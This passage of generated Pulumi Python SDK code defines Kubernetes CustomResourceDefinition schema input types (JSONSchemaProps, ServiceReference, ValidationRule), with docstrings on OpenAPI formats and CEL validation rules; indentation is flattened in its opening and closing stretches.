def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enum(self) -> Optional[pulumi.Input[Sequence[Any]]]:
return pulumi.get(self, "enum")
@enum.setter
def enum(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "enum", value)
@property
@pulumi.getter
def example(self) -> Optional[Any]:
return pulumi.get(self, "example")
@example.setter
def example(self, value: Optional[Any]):
pulumi.set(self, "example", value)
@property
@pulumi.getter(name="exclusiveMaximum")
def exclusive_maximum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_maximum")
@exclusive_maximum.setter
def exclusive_maximum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_maximum", value)
@property
@pulumi.getter(name="exclusiveMinimum")
def exclusive_minimum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_minimum")
@exclusive_minimum.setter
def exclusive_minimum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_minimum", value)
@property
@pulumi.getter(name="externalDocs")
def external_docs(self) -> Optional[pulumi.Input['ExternalDocumentationArgs']]:
return pulumi.get(self, "external_docs")
@external_docs.setter
def external_docs(self, value: Optional[pulumi.Input['ExternalDocumentationArgs']]):
pulumi.set(self, "external_docs", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[str]]:
"""
format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. 
social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]:
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]):
pulumi.set(self, "items", value)
@property
@pulumi.getter(name="maxItems")
def max_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_items")
@max_items.setter
def max_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_items", value)
@property
@pulumi.getter(name="maxLength")
def max_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_length")
@max_length.setter
def max_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_length", value)
@property
@pulumi.getter(name="maxProperties")
def max_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_properties")
@max_properties.setter
def max_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_properties", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minItems")
def min_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_items")
@min_items.setter
def min_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_items", value)
@property
@pulumi.getter(name="minLength")
def min_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_length")
@min_length.setter
def min_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_length", value)
@property
@pulumi.getter(name="minProperties")
def min_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_properties")
@min_properties.setter
def min_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_properties", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter(name="multipleOf")
def multiple_of(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "multiple_of")
@multiple_of.setter
def multiple_of(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "multiple_of", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input['JSONSchemaPropsArgs']]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input['JSONSchemaPropsArgs']]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def nullable(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "nullable")
@nullable.setter
def nullable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "nullable", value)
@property
@pulumi.getter(name="oneOf")
def one_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "one_of")
@one_of.setter
def one_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "one_of", value)
@property
@pulumi.getter
def pattern(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "pattern")
@pattern.setter
def pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pattern", value)
@property
@pulumi.getter(name="patternProperties")
def pattern_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "pattern_properties")
@pattern_properties.setter
def pattern_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "pattern_properties", value)
@property
@pulumi.getter
def properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "properties", value)
@property
@pulumi.getter
def required(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "required")
@required.setter
def required(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "required", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
    """
    The schema's type keyword (JSON Schema ``type``), e.g. ``"object"`` or ``"string"``.
    """
    return pulumi.get(self, "type")

@type.setter
def type(self, value: Optional[pulumi.Input[str]]) -> None:
    """Set the ``type`` keyword."""
    pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uniqueItems")
def unique_items(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether array items must all be distinct (JSON Schema ``uniqueItems``).
    """
    return pulumi.get(self, "unique_items")

@unique_items.setter
def unique_items(self, value: Optional[pulumi.Input[bool]]) -> None:
    """Set the ``uniqueItems`` flag."""
    pulumi.set(self, "unique_items", value)
@property
@pulumi.getter
def x_kubernetes_embedded_resource(self) -> Optional[pulumi.Input[bool]]:
    """
    x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
    """
    return pulumi.get(self, "x_kubernetes_embedded_resource")

@x_kubernetes_embedded_resource.setter
def x_kubernetes_embedded_resource(self, value: Optional[pulumi.Input[bool]]) -> None:
    """Set the ``x-kubernetes-embedded-resource`` flag."""
    pulumi.set(self, "x_kubernetes_embedded_resource", value)
@property
@pulumi.getter
def x_kubernetes_int_or_string(self) -> Optional[pulumi.Input[bool]]:
    """
    x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:

    1) anyOf:
       - type: integer
       - type: string
    2) allOf:
       - anyOf:
         - type: integer
         - type: string
       - ... zero or more
    """
    return pulumi.get(self, "x_kubernetes_int_or_string")

@x_kubernetes_int_or_string.setter
def x_kubernetes_int_or_string(self, value: Optional[pulumi.Input[bool]]) -> None:
    """Set the ``x-kubernetes-int-or-string`` flag."""
    pulumi.set(self, "x_kubernetes_int_or_string", value)
@property
@pulumi.getter
def x_kubernetes_list_map_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """
    x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.

    This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).

    The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
    """
    return pulumi.get(self, "x_kubernetes_list_map_keys")

@x_kubernetes_list_map_keys.setter
def x_kubernetes_list_map_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
    """Set the ``x-kubernetes-list-map-keys`` list."""
    pulumi.set(self, "x_kubernetes_list_map_keys", value)
@property
@pulumi.getter
def x_kubernetes_list_type(self) -> Optional[pulumi.Input[str]]:
    """
    x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:

    1) `atomic`: the list is treated as a single entity, like a scalar.
       Atomic lists will be entirely replaced when updated. This extension
       may be used on any type of list (struct, scalar, ...).
    2) `set`:
       Sets are lists that must not have multiple items with the same value. Each
       value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
       array with x-kubernetes-list-type `atomic`.
    3) `map`:
       These lists are like maps in that their elements have a non-index key
       used to identify them. Order is preserved upon merge. The map tag
       must only be used on a list with elements of type object.
    Defaults to atomic for arrays.
    """
    return pulumi.get(self, "x_kubernetes_list_type")

@x_kubernetes_list_type.setter
def x_kubernetes_list_type(self, value: Optional[pulumi.Input[str]]) -> None:
    """Set the ``x-kubernetes-list-type`` value (``atomic``, ``set`` or ``map``)."""
    pulumi.set(self, "x_kubernetes_list_type", value)
@property
@pulumi.getter
def x_kubernetes_map_type(self) -> Optional[pulumi.Input[str]]:
    """
    x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:

    1) `granular`:
       These maps are actual maps (key-value pairs) and each fields are independent
       from each other (they can each be manipulated by separate actors). This is
       the default behaviour for all maps.
    2) `atomic`: the list is treated as a single entity, like a scalar.
       Atomic maps will be entirely replaced when updated.
    """
    return pulumi.get(self, "x_kubernetes_map_type")

@x_kubernetes_map_type.setter
def x_kubernetes_map_type(self, value: Optional[pulumi.Input[str]]) -> None:
    """Set the ``x-kubernetes-map-type`` value (``granular`` or ``atomic``)."""
    pulumi.set(self, "x_kubernetes_map_type", value)
@property
@pulumi.getter
def x_kubernetes_preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
    """
    x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
    """
    return pulumi.get(self, "x_kubernetes_preserve_unknown_fields")

@x_kubernetes_preserve_unknown_fields.setter
def x_kubernetes_preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]) -> None:
    """Set the ``x-kubernetes-preserve-unknown-fields`` flag (only ``True`` or unset is valid)."""
    pulumi.set(self, "x_kubernetes_preserve_unknown_fields", value)
@property
@pulumi.getter
def x_kubernetes_validations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]]:
    """
    x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
    """
    return pulumi.get(self, "x_kubernetes_validations")

@x_kubernetes_validations.setter
def x_kubernetes_validations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]]) -> None:
    """Set the ``x-kubernetes-validations`` rule list."""
    pulumi.set(self, "x_kubernetes_validations", value)
@pulumi.input_type
class ServiceReferencePatchArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None):
        """
        ServiceReference holds a reference to Service.legacy.k8s.io

        :param pulumi.Input[str] name: name is the name of the service. Required
        :param pulumi.Input[str] namespace: namespace is the namespace of the service. Required
        :param pulumi.Input[str] path: path is an optional URL path at which the webhook will be contacted.
        :param pulumi.Input[int] port: port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
        """
        # Patch variant: every field is optional; record only the fields the
        # caller actually supplied, leaving the rest unset.
        for attr, supplied in (
            ("name", name),
            ("namespace", namespace),
            ("path", path),
            ("port", port),
        ):
            if supplied is not None:
                pulumi.set(__self__, attr, supplied)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Name of the referenced service."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """Namespace of the referenced service."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """Optional URL path at which the webhook will be contacted."""
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """Optional service port (1-65535) at which the webhook will be contacted; 443 is assumed when unset."""
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
@pulumi.input_type
class ServiceReferenceArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 path: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None):
        """
        ServiceReference holds a reference to Service.legacy.k8s.io

        :param pulumi.Input[str] name: name is the name of the service. Required
        :param pulumi.Input[str] namespace: namespace is the namespace of the service. Required
        :param pulumi.Input[str] path: path is an optional URL path at which the webhook will be contacted.
        :param pulumi.Input[int] port: port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
        """
        # name and namespace are required and always recorded.
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "namespace", namespace)
        # path and port are optional; record only if supplied.
        for attr, supplied in (("path", path), ("port", port)):
            if supplied is not None:
                pulumi.set(__self__, attr, supplied)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Name of the referenced service. Required."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """Namespace of the referenced service. Required."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """Optional URL path at which the webhook will be contacted."""
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """Optional service port (1-65535) at which the webhook will be contacted; 443 is assumed when unset."""
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
@pulumi.input_type
class ValidationRulePatchArgs:
    def __init__(__self__, *,
                 field_path: Optional[pulumi.Input[str]] = None,
                 message: Optional[pulumi.Input[str]] = None,
                 message_expression: Optional[pulumi.Input[str]] = None,
                 reason: Optional[pulumi.Input[str]] = None,
                 rule: Optional[pulumi.Input[str]] = None):
        """
        ValidationRule describes a validation rule written in the CEL expression language.
        :param pulumi.Input[str] field_path: fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
        :param pulumi.Input[str] message: Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
        :param pulumi.Input[str] message_expression: MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
        :param pulumi.Input[str] reason: reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
        :param pulumi.Input[str] rule: Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
               If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
               The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
               Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
                 - A schema with no type and x-kubernetes-preserve-unknown-fields set to true
                 - An array where the items schema is of an "unknown type"
                 - An object where the additionalProperties schema is of an "unknown type"
               Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
                 "true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
                 "import", "let", "loop", "package", "namespace", "return".
               Examples:
                 - Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
                 - Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
                 - Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
               Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
                 - 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
                   non-intersecting elements in `Y` are appended, retaining their partial order.
                 - 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
                   are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
                   non-intersecting keys are appended, retaining their partial order.
        """
        # Patch variant: every field is optional; only explicitly supplied
        # values are recorded on the input object.
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if message is not None:
            pulumi.set(__self__, "message", message)
        if message_expression is not None:
            pulumi.set(__self__, "message_expression", message_expression)
        if reason is not None:
            pulumi.set(__self__, "reason", reason)
        if rule is not None:
            pulumi.set(__self__, "rule", rule)

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[pulumi.Input[str]]:
        """
        fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
        """
        return pulumi.get(self, "field_path")

    @field_path.setter
    def field_path(self, value: Optional[pulumi.Input[str]]) -> None:
        """Set the ``fieldPath`` reported on validation failure."""
        pulumi.set(self, "field_path", value)

    @property
    @pulumi.getter
    def message(self) -> Optional[pulumi.Input[str]]:
        """
        Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
        """
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: Optional[pulumi.Input[str]]) -> None:
        """Set the static validation-failure message."""
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter(name="messageExpression")
    def message_expression(self) -> Optional[pulumi.Input[str]]:
        """
        MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
        """
        return pulumi.get(self, "message_expression")

    @message_expression.setter
    def message_expression(self, value: Optional[pulumi.Input[str]]) -> None:
        """Set the CEL ``messageExpression`` used to build the failure message."""
        pulumi.set(self, "message_expression", value)

    @property
    @pulumi.getter
    def reason(self) -> Optional[pulumi.Input[str]]:
        """
        reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
        """
        return pulumi.get(self, "reason")

    @reason.setter
    def reason(self, value: Optional[pulumi.Input[str]]) -> None:
        """Set the machine-readable failure ``reason``."""
        pulumi.set(self, "reason", value)

    @property
    @pulumi.getter
    def rule(self) -> Optional[pulumi.Input[str]]:
        """
        Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
        If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
        The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
        Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
          - A schema with no type and x-kubernetes-preserve-unknown-fields set to true
          - An array where the items schema is of an "unknown type"
          - An object where the additionalProperties schema is of an "unknown type"
        Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
          "true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
          "import", "let", "loop", "package", "namespace", "return".
        Examples:
          - Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
          - Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
          - Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
        Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
          - 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
            non-intersecting elements in `Y` are appended, retaining their partial order.
          - 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
            are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
            non-intersecting keys are appended, retaining their partial order.
        """
        return pulumi.get(self, "rule")

    @rule.setter
    def rule(self, value: Optional[pulumi.Input[str]]) -> None:
        """Set the CEL ``rule`` expression."""
        pulumi.set(self, "rule", value)
@pulumi.input_type
class ValidationRuleArgs:
def __init__(__self__, *,
rule: pulumi.Input[str],
field_path: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
message_expression: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
ValidationRule describes a validation rule written in the CEL expression language.
